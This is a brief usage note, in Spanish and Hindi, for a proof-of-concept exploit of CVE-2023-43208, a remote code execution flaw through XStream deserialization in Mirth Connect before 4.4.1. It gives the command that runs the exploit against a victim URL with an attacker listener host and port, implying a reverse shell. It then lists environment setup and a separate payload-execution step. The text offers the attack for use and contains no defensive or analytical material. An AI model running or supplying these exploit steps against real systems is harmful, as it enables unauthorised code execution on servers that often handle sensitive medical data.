
Explota vulnerabilidad
यह स्क्रिप्ट Mirth Connect (संस्करण 4.4.1 से पहले) में रिमोट कोड निष्पादन (RCE) भेद्यता के लिए एक अवधारणा प्रमाण (PoC) है। यह API के माध्यम से XStream डिसीरियलाइज़ेशन भेद्यता का शोषण करता है।
python3 CVE-2023-43208.py -u [https://IP-victima] -lh [IP-atacante] -lp [puerto]
वर्चुअल एनवायरनमेंट का उपयोग अनुशंसित है:
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
#पेलोड निष्पादन
python3 payload.py